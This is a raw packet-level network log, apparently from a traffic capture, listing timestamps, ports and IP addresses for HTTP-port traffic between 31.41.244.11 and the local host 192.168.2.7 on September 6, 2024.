Sep 6, 2024 09:58:10.207866907 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.207881927 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.207894087 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.207954884 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.207971096 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.207993984 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.208007097 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.208019972 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.208019972 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.208036900 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.208045006 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.208066940 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.208086014 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.208475113 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.208513975 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.208528042 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.208539963 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.208559990 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.208592892 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.208662987 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.208681107 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.208690882 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.208703041 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.208714962 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.208717108 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.208729982 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.208739996 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.208753109 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.208765030 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.208777905 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.208791971 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.208806038 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.208811998 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.208820105 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.208839893 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.208839893 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.208858013 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.208976030 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209013939 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.209033966 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209067106 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.209105015 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209120989 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209141970 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.209146023 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209157944 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209168911 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209172964 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.209181070 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209189892 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.209217072 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.209258080 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209270000 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209280968 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209291935 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.209295034 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209306955 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209319115 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209319115 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.209331989 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209343910 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209347010 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.209369898 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.209386110 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.209487915 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209501982 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209515095 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209538937 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.209563017 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.209610939 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209623098 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209635019 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209649086 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209661961 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209661007 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.209686041 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.209705114 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.209775925 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209789038 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209800959 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209811926 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.209811926 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209832907 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.209852934 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.209896088 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209908962 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209922075 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.209952116 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.209980011 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.210021973 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210035086 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210047960 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210062027 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210073948 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210077047 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.210086107 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210098028 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210108995 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.210112095 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210123062 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210138083 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.210165024 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.210217953 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210231066 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210267067 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210279942 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.210287094 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210295916 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.210300922 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210314035 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210325003 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.210334063 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.210334063 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210347891 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.210364103 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.210391998 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.210403919 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210417032 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210431099 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210453987 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.210455894 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210469961 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210491896 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.210511923 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.210513115 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210525990 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210536957 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210551977 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.210572958 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.210947037 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.210984945 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.211002111 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.211009026 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.211036921 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.211081982 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.211093903 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.211106062 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.211118937 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.211127996 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.211143017 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.211188078 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.245512009 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.245532036 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.245548010 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.245560884 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.245568991 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.245574951 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.245589018 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.245599985 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.245600939 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.245613098 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.245640039 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.245769024 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.256855965 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.256875992 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.256901026 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.256915092 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.256946087 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.256946087 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.256959915 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.256963015 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.256973028 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.256980896 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.256984949 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.257000923 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.257006884 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.257019043 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.257030010 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.257035971 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.257042885 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.257055044 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.257066011 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.257071972 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.257080078 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.257102013 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.257110119 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.257121086 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.257123947 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.257143021 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.257144928 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.257157087 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.257169962 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.257170916 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.257188082 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.257213116 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.257222891 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.257236004 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.257247925 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.257258892 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.257273912 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.257292986 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.295779943 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.295825958 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.295838118 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.295840979 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.295852900 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.295871973 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.295880079 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.295886040 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.295887947 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.295898914 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.295909882 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.295937061 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.295948029 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.296396971 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.296557903 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.296571016 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.296581030 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.296586990 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.296600103 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.296612024 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.296622038 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.296663046 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.296686888 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.296751022 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.296931028 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.296941996 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.296953917 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.296976089 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.297003031 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.297068119 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297080040 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297090054 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297103882 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297116995 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.297117949 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297156096 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.297166109 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.297192097 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297290087 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.297373056 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297389984 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297399998 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297411919 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297422886 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297425985 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.297441006 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.297458887 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.297512054 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297523975 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297535896 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297549009 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297554016 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.297559977 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297573090 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297588110 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.297619104 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.297657013 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297671080 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297683001 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297693014 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297708035 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.297708035 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297720909 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297725916 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.297735929 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297746897 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297760963 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.297791958 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.297815084 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297827005 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297838926 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297851086 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297857046 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.297887087 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.297905922 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.297969103 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.297982931 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298023939 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.298120975 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298131943 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298145056 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298166037 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.298173904 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.298196077 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.298327923 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298341036 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298352957 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298365116 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298377991 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298386097 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.298413038 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.298477888 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298489094 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298500061 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298518896 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.298537016 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.298651934 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298664093 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298676968 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298687935 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298702002 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298712969 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.298715115 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298726082 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298736095 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298748016 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298754930 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.298779011 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.298785925 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298796892 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298801899 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.298811913 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298820972 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.298823118 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298832893 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298840046 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.298863888 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.298881054 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.298969030 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298974037 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298985004 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298990965 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.298995972 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.299050093 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.299072981 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.299105883 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.299117088 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.299128056 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.299146891 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.299173117 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.299261093 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.299277067 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.299290895 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.299302101 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.299312115 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.299319983 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.299324036 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.299338102 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.299341917 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.299365044 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.299379110 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.299712896 CEST	80	49721	31.41.244.11	192.168.2.7
